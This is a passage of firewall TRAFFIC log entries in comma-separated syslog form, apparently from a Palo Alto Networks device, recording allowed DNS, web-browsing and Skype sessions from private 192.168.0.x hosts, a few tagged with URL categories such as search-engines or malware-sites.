04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 